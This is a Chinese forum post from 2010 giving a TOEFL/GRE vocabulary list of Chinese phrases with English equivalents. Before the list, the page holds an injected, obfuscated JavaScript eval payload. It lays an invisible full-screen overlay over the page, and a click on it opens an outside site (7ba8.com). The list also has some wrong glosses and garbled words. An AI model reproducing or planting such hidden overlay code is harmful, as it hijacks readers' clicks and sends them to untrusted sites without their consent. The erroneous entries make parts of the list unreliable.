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标题: 托福、GRE常用词汇列表 [打印本页]

作者: yangzi0409    时间: 2010-6-2 18:03
标题: 托福、GRE常用词汇列表
<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>一些a range of ; a variety of ; aseries of ; an array of
无数innumerable ; countless
许多plenty of ; many ; much ; a great deal of ; a lotof ; ample
依序列举list in sequence
过时的outdated ; antiquated ; outmoded ; obsolete ;anachronistic
短暂的ephemeral ; transitory ; transient ;short-lived
可持久的durable ; able to stand wear ; last a longtime
一再time aftertime ; again and again
前述的aforementioned ; aforesaid ;former
自古到今fromancient times to the present day ; down through theages
年轻人youngpeople ; youngster ; youth ; young adult
老式的old-fashioned ; out of date ;dated
偶尔from timeto time ; now and then ; once in a while ; attimes
时常often ;frequently ; repeatedly
永远的eternal ; perpetual ; lasting throughoutlife
重整办事优先顺序reshape priorities
目前so far ; by far
一次就可完成的事one-time event
骂yell at ;reprimand ; chide ; scold ; reprove
支持support ; endorse ; back up ;uphold
谴责condemn ;express strong disapproval of
错的mistaken ; erroneous ; wrong incorrect
错事wrongdoing ; had acts ;misbehavior
做相反的dothe reverse of ; do the opposite
归咎blame…on ; put the blame on … ; …is toblame
瓦解disintegrate ; break up ; separate into smallparts
支持某一方in favorof ; on the side of
意见不和clashes of opinion
一致的unanimous ; in completeagreement
不恰当inappropriate ; improper ; unsuitable ;inadequate
批判criticize ; blame; find fault with ; make judgments of themerits and faults of…
我们想念…weare convinced that…; weare certain that..
我愿意I incline to; I am inclined to; I am willing to; I tendto
有用的useful ; ofuse; serviceable; good for; instrumental;productive
有意义的meaningful; fulfilling
他们不愿承认这一点they have always been reluctant to admitthis…
在大家同意下bycommon consent of…
否定deny;withhold; negate
承认admit; acknowledge; confess;concede
于事无补of nohelp; of no avail; no use
使…受益benefit…; do good to…;is good for…; is ofgreat benefit to…
想法frame ofmind; mind set; the way one is thinking
想出come up with
找出come up with; findout
利用use; takeadvantage of
夸耀bragabout; boast about; show off; speak too highlyof
照顾take care of;take charge of; attend to; watch over
对…很了解have a deep knowledgeof…
对抗权威standup against authority; resisit boldly theauthority
对…有信心haveconfidence in
说清楚articulate; verbalize; put in words;utter
接受…之美意embracethe offer of…
累积amass;accumulate; heap up; assemble
连系tact; get in touch with; contactwith
排除这可能性rule outthe possibility
等于is equivalent to; equal
选择choose; elect; opt for; pick; singleout
发出deliver; giveout; hand over
绕路detour; take a detour; take a roundaboutway
禁止进入is keptout; is barred from
小看make little of
坏了out of order; on the blink; is notworking
分别distinguish between; make a distinction between;tell…from
依靠count on; depend on
忽视neglect; give too little careto
存在come to be;come into existence; come to birth; come intobeing
考虑consider;take into consideration; take intoaccount
考虑到inconsideration of
用尽力气exhaust one’sstrength; use up one’sstrength
开动initiate; set going
准备…brace for; prepare for
在于lie in; rest on; restwith
主动take theinitiative
不算exclusive of; not counting; leavingout
应该得到deserve;have right to; is worthy of
避免avoid; shun; get around;circumvent
幻想fantasy; play of the mind
以此标准来算by this criterion; by thisstandard
乍看之下atfirst glance
面对inthe face of; in the presence of
以by means of; by virtue of; by the useof
不惜代价at allcosts
每况愈下from badto worse
承受错误造成的后果in reaping the harvest of hismistakes
取得同意…getthe go-ahead to
不择手段unscrupulously; by hook or bycrook
想法与作法beliefsand practices
内情insand outs; turns and twists
关键时刻the critical moment
虽然although; notwithstanding; albeit;though
根据accordingto; on the basis of; on the ground of (that); in the light of; inline with; in accordance with
逃避问题evade the question
增大enlarge; extend;aggrandize
澄清clarify; make clear
赔偿compensate for; give…as compensation for
实现carry out; implement; realize;make…cometrue
假定suppose;assume; postulate; hypothesize
极端的radical; extreme
剩下的therest; the remainder; what is left
换言之in other words; put anotherway
结果result;aftermath; consequence
优点advantage; strength; strong point; merit;benefit
简言之putsimply; in short; in brief; in anutshell
举例而言forinstance; for example; to illustrate; let us cite特别是an illustration; to cite aconcrete case
特别是especially; more than others; particularly; inparticular
既然…nowthat…; seeingthat…
迹象inkling;hint; clue; a slight suggestion
缺点disadvantage; demerit; shortcoming; drawback;weakness
除去do awaywith; eliminate; remove; get rid of
缺少for lack of; for a deficiencyof
毕竟after all; allin all
范围scope;field; realm
行为conduct; behavior; doings
隔绝isolate; insulate
不易懂的elusive; hard to understand
主导的人物a dominant figure; a controlling man; the mostinfluential person
观点viewpoint; point of view; perspective;standpoint
只是一种姿态ismerely a gesture
立场position; stand; stance
意向inclination; leaning;intention
特权privilege; a special right
来自stem from; comefrom
一件事的不同说法alternative statements of fact
好奇心theeager desire to know; curiosity
尊敬respect; esteem; think highlyof
顽固的headstrong;obstinate; stubborn
暗淡的gloomy; dark; dim
巨大的huge; gigantic; colossal; vast; enormous;tremendous
探索explore; fathom
执行carry out; execute; do
现代modern times; modern age; contemporaryage
偏见prejudice;bias; partiality; predilection
混乱chaos; commotion; confusion; disturbance;tumult
无缺点的flawless; airtight
细密的计划elaborate plan
取消cancel; annul; abolish
解药a cure for…; a remedy for;
谜puzzle; riddle; enigma
机会平等equality ofopportunity
较有影响力的国家a predominant country
遵守abide by; conform to; observe; complywith
热情的passionate;ardent; zealous
模糊的ambiguous; vague; obscure
失望despair; loss of hope; withouthope
幼稚childish;childlike; na飗e
挑剔的picky;choosy; fastidious
破坏destroy; ruin; break to pieces;devasate
技巧的skillful; adept; dexterous
警觉的alert; watchful; on guard; waryof
忍受bear; put upwith; endure; stand
证据evidence; facts; proof; grounds;testimony
很容易地easily; with little problem; with littlehindrance
令人惊讶的amazing; astonishing;astounding
生动的报导vivid description
争取compete for; try hard towin
遗产heritage;legacy; inheritance
保护protect; safeguard; preserve;shelter
了解understand; comprehend; catch the meaning of; catchon
汇露reveal; makeknown; disclose
放大amplify; magnify; enlarge
动力impetus; driving force;momentum
第一流的first-rate; excellent
安全处refuge; asylum; haven;sanctuary
强调emphasize; stress; highlight
真正的genuine; authentic; real
怪异的eccentric; peculiar;odd
明显的distinct;clear; explicit; obvious
得到…的注意capture one’s attention
事事干涉的meddlesome; interfering
背景setting; background
假的fake; false;counterfeit
古人the ancients
古老的old; ancient; archaeic
逃犯infringe (on); violate
准确地说to be exact; to be precise;precisely
突然醒悟itdawned on me that
仔细思考之后after long deliberation; after carefulthought
可与…相比is comparable with (to)
普遍的prevailing; common;prent
是一个对比is asharp contrast to
比作is likened to; is compared to
一般而言in general; generally speaking; by andlarge
满于现状be happywith what you are
预测未来project into the future
另一个观点是… another way of looking at the matteris

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